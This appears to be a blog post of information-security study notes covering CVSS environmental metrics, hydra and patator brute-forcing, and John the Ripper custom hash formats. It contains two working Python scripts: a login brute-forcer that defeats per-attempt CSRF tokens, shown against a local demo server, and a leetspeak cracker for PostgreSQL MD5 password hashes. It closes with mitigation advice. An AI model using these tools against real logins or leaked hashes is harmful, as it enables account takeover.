Information Security Keywords

Published: August 22, 2024

Here are some keywords I’ve come across when studying various information security topics.

CVSS

I refer to CVSS v3.1 here.

Environmental metric group

This group captures the impact a vulnerability has in a particular user's environment rather than in general. In CVSS v3.1 it has two parts: the Security Requirements (Confidentiality, Integrity and Availability Requirement: CR, IR, AR), which express how much the organization cares about each of confidentiality, integrity and availability for the affected system, and the Modified Base Metrics (MAV, MAC, MPR, MUI, MS, MC, MI, MA), which let the analyst override any base metric to reflect mitigations or deployment specifics.

By default each requirement is Not Defined, which is weighted the same as Medium (1.0). Setting a requirement to Low (0.5) or High (1.5) lowers or raises the environmental score, but only through the matching impact metric: raising the Availability Requirement does nothing for a vulnerability whose availability impact is None. The modified impact sub-score is also capped at 0.915 by the specification, which limits how far High requirements can push a score that is already near the top.

Brute-forcing tools

thc-hydra

It worked well for brute-forcing basic SMB and HTTP. For SMB against current servers it needs to be built with libsmbclient (Samba's client library) on Linux and used with the smb2 module; the older smb module only speaks SMBv1, which recent Windows versions disable by default.

Unfortunately, it does not work well with HTTP forms that require submitting a hidden field such as a CSRF token: its http-post-form module can attach static cookies and headers to the POST (the H= option), but it cannot fetch the form first, extract a per-session token and insert it into each request body.


patator

This works well for brute-forcing HTML forms that require a CSRF token to be submitted with every attempt. Its http_fuzz module has options (before_urls and before_egrep) to fetch a separate page first and grep a value out of it with a regular expression, for example from a hidden field like the following:

<input type="hidden" name="csrf-token" value="foobar" />

The value foobar is captured into a placeholder (such as _CSRF_) that can then be referenced in the body= option when generating the HTTP POST body, so every attempt carries a fresh, valid token.
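To make the difference between the two tools concrete, here is an added example (my own code, not part of the original post and not patator's or hydra's code) that reproduces the mechanism end to end. It starts a tiny in-process login server, constructed for this example, that ties a fresh hidden csrf-token to each session cookie and refuses any POST whose token is missing, stale or reused. The client side then does what before_urls and before_egrep do: fetch the form, pull the token out with a regular expression, and splice it into the POST body. The credentials, URL paths and wordlist are all assumptions made up for the demo.

```python
"""Form brute-forcing with a per-attempt CSRF token: the case a static
cookie (hydra's H= option) cannot handle and a fetch-then-grep step can.

Added example, not from the original post. The login server below is
constructed for this demo; the client mimics patator's before_urls +
before_egrep behaviour with urllib and a regex.
"""
import http.cookies
import re
import secrets
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

USERNAME, PASSWORD = "admin", "s3cret"     # constructed target credentials
TOKENS = {}                                # session id -> current csrf token
TOKEN_RE = re.compile(r'name="csrf-token" value="([^"]+)"')   # the before_egrep regex
# Ignore any http_proxy environment variables so loopback requests go direct.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class LoginHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):           # silence per-request logging
        pass

    def do_GET(self):
        # Every GET starts a new session with its own single-use token.
        sid, token = secrets.token_hex(8), secrets.token_hex(16)
        TOKENS[sid] = token
        body = (f'<form method="post"><input type="hidden" name="csrf-token" '
                f'value="{token}" /></form>').encode()
        self.send_response(200)
        self.send_header("Set-Cookie", f"session={sid}")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        jar = http.cookies.SimpleCookie(self.headers.get("Cookie", ""))
        sid = jar["session"].value if "session" in jar else None
        token = form.get("csrf-token", [None])[0]
        # pop() makes the token single-use: a replayed or stale token fails.
        if token is None or TOKENS.pop(sid, None) != token:
            body = b"Bad CSRF token"
        elif form.get("user") == [USERNAME] and form.get("pass") == [PASSWORD]:
            body = b"Welcome"
        else:
            body = b"Invalid credentials"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)   # port 0: pick a free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_token(base_url):
    """GET the login page and return (session cookie, csrf token):
    the before_urls + before_egrep step."""
    with OPENER.open(base_url + "/login") as resp:
        cookie = resp.headers["Set-Cookie"].split(";")[0]
        match = TOKEN_RE.search(resp.read().decode())
    if not match:
        raise RuntimeError("csrf token not found in form")
    return cookie, match.group(1)


def try_login(base_url, user, password, session=None):
    """One login attempt. A fresh (cookie, token) pair is fetched unless
    `session` supplies one, which lets you show a reused token being refused."""
    cookie, token = session or fetch_token(base_url)
    data = urllib.parse.urlencode({"user": user, "pass": password, "csrf-token": token}).encode()
    req = urllib.request.Request(base_url + "/login", data=data, headers={"Cookie": cookie})
    with OPENER.open(req) as resp:
        return resp.read().decode()


def brute_force(base_url, user, wordlist):
    """Return the first candidate that logs in, or None."""
    for candidate in wordlist:
        if try_login(base_url, user, candidate) == "Welcome":
            return candidate
    return None


if __name__ == "__main__":
    server = start_server()
    url = f"http://127.0.0.1:{server.server_address[1]}"
    print(brute_force(url, "admin", ["password", "letmein", "s3cret"]))  # s3cret
    server.shutdown()
```

The server's pop() is the important detail: because the token is consumed on first use and bound to the session cookie, a tool that captured one cookie and token up front would get "Bad CSRF token" on every attempt after the first, which is exactly why the per-attempt fetch is needed. It also doubles the number of requests per guess, so expect half the throughput of a plain form attack.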


John the Ripper

A feature of John that surprised me a lot is the ability to define custom hash formats using its dynamic formats. If a specific password hash uses a very obscure "hash, then salt, then hash, then add constant"-type method, it can be defined quite easily in a domain-specific language (DSL).

I have had tremendous success using this in combination with the d3ad0ne rule to crack leetspeak-like passwords after extracting slightly obscure PostgreSQL MD5 password hashes. MD5 is very dangerous indeed.
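As an added example (my own code, not John's and not part of the original post), here is a miniature evaluator for expressions in the style of John's dynamic compiler, such as md5(md5($p).$s), together with a small leetspeak rule and the PostgreSQL case from above: PostgreSQL's legacy rolpassword format is the string "md5" followed by md5(password || username), i.e. md5($p.$s) with the username as the salt. The parser, the substitution table and the hash cracked in the usage block are all constructed for this demo; the real d3ad0ne rule set is far richer than the six substitutions used here.

```python
"""A miniature 'dynamic format' evaluator, modelled on the expression syntax
of John the Ripper's dynamic compiler (e.g. md5(md5($p).$s)), plus a
PostgreSQL MD5 example with a tiny leetspeak rule.

Added example, not from the original post and not John's code: the parser
and the leet substitution table are written here for illustration, and the
hash cracked below is constructed in the usage block.
"""
import hashlib
import itertools
import re

# $p = password, $s = salt, "..." = constant, '.' = concatenation.
TOKEN_RE = re.compile(r'\s*(md5|sha1|sha256|\$p|\$s|"[^"]*"|[().])')
HASHES = ("md5", "sha1", "sha256")


def tokenize(expr):
    pos, tokens = 0, []
    expr = expr.rstrip()
    while pos < len(expr):
        match = TOKEN_RE.match(expr, pos)
        if not match:
            raise ValueError(f"bad token at {expr[pos:]!r}")
        tokens.append(match.group(1))
        pos = match.end()
    return tokens


def evaluate(expr, password, salt=""):
    """Evaluate a dynamic-style expression; each hash call yields lowercase
    hex, which is fed as text into any enclosing hash, as John does."""
    tokens = tokenize(expr)

    def take(expected=None):
        if not tokens:
            raise ValueError("unexpected end of expression")
        tok = tokens.pop(0)
        if expected is not None and tok != expected:
            raise ValueError(f"expected {expected!r}, got {tok!r}")
        return tok

    def concat():                      # term ('.' term)*
        out = term()
        while tokens and tokens[0] == ".":
            take(".")
            out += term()
        return out

    def term():
        tok = take()
        if tok == "$p":
            return password
        if tok == "$s":
            return salt
        if tok.startswith('"'):
            return tok[1:-1]
        if tok in HASHES:
            take("(")
            inner = concat()
            take(")")
            return hashlib.new(tok, inner.encode()).hexdigest()
        raise ValueError(f"unexpected token {tok!r}")

    result = concat()
    if tokens:
        raise ValueError("trailing tokens: " + " ".join(tokens))
    return result


# A few substitutions in the spirit of a leetspeak rule file; a real rule set
# (d3ad0ne, best64, ...) is far richer than this.
LEET = {"a": "4", "e": "3", "i": "1", "o": "0", "s": "5", "t": "7"}


def leet_variants(word):
    """Yield the word with every subset of LEET substitutions applied."""
    positions = [i for i, c in enumerate(word) if c.lower() in LEET]
    for n in range(len(positions) + 1):
        for subset in itertools.combinations(positions, n):
            chars = list(word)
            for i in subset:
                chars[i] = LEET[chars[i].lower()]
            yield "".join(chars)


def postgres_md5(password, username):
    """PostgreSQL's legacy rolpassword: 'md5' + md5(password || username),
    i.e. the dynamic expression md5($p.$s) with the username as salt."""
    return "md5" + evaluate("md5($p.$s)", password, username)


def crack_postgres(rolpassword, username, wordlist):
    """Try every leet variant of every word against a PostgreSQL MD5 hash."""
    if not rolpassword.startswith("md5"):
        raise ValueError("not a PostgreSQL md5 hash")
    for word in wordlist:
        for candidate in leet_variants(word):
            if postgres_md5(candidate, username) == rolpassword:
                return candidate
    return None


if __name__ == "__main__":
    target = postgres_md5("p4ssw0rd", "postgres")        # constructed hash
    print(crack_postgres(target, "postgres", ["welcome", "password"]))  # p4ssw0rd
```

Two things the example makes visible: the "salt" in this scheme is the username, which is public and identical for every installation with the same role name, so a single unsalted-style dictionary run covers every postgres superuser out there; and a single MD5 per guess is cheap enough that rule-based mangling of a wordlist is entirely practical. Setting password_encryption to scram-sha-256 (the default since PostgreSQL 14) and resetting existing passwords removes this hash type from the database.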

